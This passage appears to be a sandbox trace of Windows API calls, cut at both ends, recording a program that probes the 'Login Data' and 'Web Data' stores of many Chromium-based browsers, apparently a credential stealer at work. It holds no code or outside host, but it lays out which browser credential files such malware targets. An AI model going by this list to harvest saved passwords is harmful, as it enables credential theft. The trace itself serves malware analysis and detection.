Data\\Default\\Web Data") returned 0 [0111.577] GetProcessHeap () returned 0x5b0000 [0111.578] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bb0b8 | out: hHeap=0x5b0000) returned 1 [0111.578] GetProcessHeap () returned 0x5b0000 [0111.578] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.578] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.579] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 59 [0111.579] GetProcessHeap () returned 0x5b0000 [0111.579] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a) returned 0x5cbe70 [0111.579] GetProcessHeap () returned 0x5b0000 [0111.580] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.580] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 0 [0111.581] GetProcessHeap () returned 0x5b0000 [0111.581] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.581] GetProcessHeap () returned 0x5b0000 [0111.581] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.582] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.582] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 67 [0111.582] GetProcessHeap () returned 0x5b0000 [0111.582] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8a) returned 0x5cbe80 [0111.582] GetProcessHeap () returned 0x5b0000 [0111.583] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.587] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 0 [0111.587] GetProcessHeap () returned 0x5b0000 [0111.587] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.588] GetProcessHeap () returned 0x5b0000 [0111.588] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.588] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.589] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 87 [0111.589] GetProcessHeap () returned 0x5b0000 [0111.589] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb2) returned 0x5cbe98 [0111.589] GetProcessHeap () returned 0x5b0000 [0111.590] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.590] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 0 [0111.591] GetProcessHeap () returned 0x5b0000 [0111.591] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.591] GetProcessHeap () returned 0x5b0000 [0111.591] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.592] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.592] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 85 [0111.592] GetProcessHeap () returned 0x5b0000 [0111.592] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xae) returned 0x5cbe90 [0111.592] GetProcessHeap () returned 0x5b0000 [0111.593] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.594] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.594] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 0 [0111.594] GetProcessHeap () returned 0x5b0000 [0111.594] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.594] GetProcessHeap () returned 0x5b0000 [0111.594] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.595] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.596] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 68 [0111.596] GetProcessHeap () returned 0x5b0000 [0111.596] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8c) returned 0x5cbe70 [0111.596] GetProcessHeap () returned 0x5b0000 [0111.596] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.597] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 0 [0111.597] GetProcessHeap () returned 0x5b0000 [0111.597] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.597] GetProcessHeap () returned 0x5b0000 [0111.597] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.598] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.599] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 76 [0111.600] GetProcessHeap () returned 0x5b0000 [0111.600] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9c) returned 0x5bb4a8 [0111.600] GetProcessHeap () returned 0x5b0000 [0111.600] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.601] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 0 [0111.601] GetProcessHeap () returned 0x5b0000 [0111.602] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bb4a8 | out: hHeap=0x5b0000) returned 1 [0111.602] GetProcessHeap () returned 0x5b0000 [0111.602] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.602] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.603] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 78 [0111.603] GetProcessHeap () returned 0x5b0000 [0111.603] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa0) returned 0x5bac20 [0111.603] GetProcessHeap () returned 0x5b0000 [0111.604] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.605] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 0 [0111.605] GetProcessHeap () returned 0x5b0000 [0111.606] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bac20 | out: hHeap=0x5b0000) returned 1 [0111.606] GetProcessHeap () returned 0x5b0000 [0111.606] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.606] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.607] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 76 [0111.607] GetProcessHeap () returned 0x5b0000 [0111.607] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9c) returned 0x5baec0 [0111.607] GetProcessHeap () returned 0x5b0000 [0111.608] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.609] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 0 [0111.609] GetProcessHeap () returned 0x5b0000 [0111.609] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5baec0 | out: hHeap=0x5b0000) returned 1 [0111.609] GetProcessHeap () returned 0x5b0000 [0111.609] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.610] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.611] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 59 [0111.611] GetProcessHeap () returned 0x5b0000 [0111.611] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a) returned 0x5cbe70 [0111.611] GetProcessHeap () returned 0x5b0000 [0111.611] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.612] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 0 [0111.613] GetProcessHeap () returned 0x5b0000 [0111.613] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.613] GetProcessHeap () returned 0x5b0000 [0111.613] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.614] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.615] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 67 [0111.615] GetProcessHeap () returned 0x5b0000 [0111.615] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8a) returned 0x5cbe80 [0111.615] GetProcessHeap () returned 0x5b0000 [0111.615] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.616] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 0 [0111.616] GetProcessHeap () returned 0x5b0000 [0111.617] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.617] GetProcessHeap () returned 0x5b0000 [0111.617] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.617] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.618] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 73 [0111.618] GetProcessHeap () returned 0x5b0000 [0111.618] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x96) returned 0x5cbe98 [0111.618] GetProcessHeap () returned 0x5b0000 [0111.619] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.620] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 0 [0111.620] GetProcessHeap () returned 0x5b0000 [0111.620] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.620] GetProcessHeap () returned 0x5b0000 [0111.620] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.621] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.622] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 71 [0111.622] GetProcessHeap () returned 0x5b0000 [0111.622] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x92) returned 0x5cbe90 [0111.622] GetProcessHeap () returned 0x5b0000 [0111.622] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.623] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.623] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 0 [0111.624] GetProcessHeap () returned 0x5b0000 [0111.624] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.624] GetProcessHeap () returned 0x5b0000 [0111.624] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.625] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.625] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 54 [0111.625] GetProcessHeap () returned 0x5b0000 [0111.625] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x70) returned 0x5cbe70 [0111.625] GetProcessHeap () returned 0x5b0000 [0111.626] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.627] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 0 [0111.627] GetProcessHeap () returned 0x5b0000 [0111.627] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.627] GetProcessHeap () returned 0x5b0000 [0111.627] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.628] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.629] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 62 [0111.629] GetProcessHeap () returned 0x5b0000 [0111.629] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x80) returned 0x5cbe80 [0111.629] GetProcessHeap () returned 0x5b0000 [0111.629] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.632] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 0 [0111.632] GetProcessHeap () returned 0x5b0000 [0111.632] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.632] GetProcessHeap () returned 0x5b0000 [0111.632] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.633] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.635] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 73 [0111.635] GetProcessHeap () returned 0x5b0000 [0111.635] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x96) returned 0x5cbe98 [0111.635] GetProcessHeap () returned 0x5b0000 [0111.635] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.636] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 0 [0111.636] GetProcessHeap () returned 0x5b0000 [0111.637] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.637] GetProcessHeap () returned 0x5b0000 [0111.637] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.637] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.638] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 71 [0111.638] GetProcessHeap () returned 0x5b0000 [0111.638] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x92) returned 0x5cbe90 [0111.638] GetProcessHeap () returned 0x5b0000 [0111.639] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.640] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 0 [0111.640] GetProcessHeap () returned 0x5b0000 [0111.640] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.640] GetProcessHeap () returned 0x5b0000 [0111.640] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.641] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.642] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 54 [0111.642] GetProcessHeap () returned 0x5b0000 [0111.642] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x70) returned 0x5cbe70 [0111.642] GetProcessHeap () returned 0x5b0000 [0111.642] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.643] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 0 [0111.643] GetProcessHeap () returned 0x5b0000 [0111.644] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.644] GetProcessHeap () returned 0x5b0000 [0111.644] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.644] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.645] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 62 [0111.645] GetProcessHeap () returned 0x5b0000 [0111.645] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x80) returned 0x5cbe80 [0111.645] GetProcessHeap () returned 0x5b0000 [0111.645] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.646] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 0 [0111.646] GetProcessHeap () returned 0x5b0000 [0111.647] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.647] GetProcessHeap () returned 0x5b0000 [0111.647] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.647] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.648] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 70 [0111.648] GetProcessHeap () returned 0x5b0000 [0111.648] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x90) returned 0x5cbe98 [0111.648] GetProcessHeap () returned 0x5b0000 [0111.649] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.649] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 0 [0111.649] GetProcessHeap () returned 0x5b0000 [0111.650] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.650] GetProcessHeap () returned 0x5b0000 [0111.650] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.650] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.651] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 68 [0111.651] GetProcessHeap () returned 0x5b0000 [0111.651] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8c) returned 0x5cbe90 [0111.651] GetProcessHeap () returned 0x5b0000 [0111.651] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.652] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.652] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 0 [0111.652] GetProcessHeap () returned 0x5b0000 [0111.653] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.653] GetProcessHeap () returned 0x5b0000 [0111.653] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.653] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.654] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 51 [0111.654] GetProcessHeap () returned 0x5b0000 [0111.654] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6a) returned 0x5cbe70 [0111.654] GetProcessHeap () returned 0x5b0000 [0111.654] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.655] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 0 [0111.655] GetProcessHeap () returned 0x5b0000 [0111.655] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.655] GetProcessHeap () returned 0x5b0000 [0111.655] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.656] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.656] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 59 [0111.656] GetProcessHeap () returned 0x5b0000 [0111.656] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a) returned 0x5cbe80 [0111.657] GetProcessHeap () returned 0x5b0000 [0111.657] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.657] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 0 [0111.658] GetProcessHeap () returned 0x5b0000 [0111.658] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.658] GetProcessHeap () returned 0x5b0000 [0111.658] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.658] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.659] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 73 [0111.659] GetProcessHeap () returned 0x5b0000 [0111.659] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x96) returned 0x5cbe98 [0111.659] GetProcessHeap () returned 0x5b0000 [0111.660] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.660] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 0 [0111.660] GetProcessHeap () returned 0x5b0000 [0111.661] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.661] GetProcessHeap () returned 0x5b0000 [0111.661] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.662] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.662] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 71 [0111.663] GetProcessHeap () returned 0x5b0000 [0111.663] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x92) returned 0x5cbe90 [0111.663] GetProcessHeap () returned 0x5b0000 [0111.663] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.664] PathFileExistsW 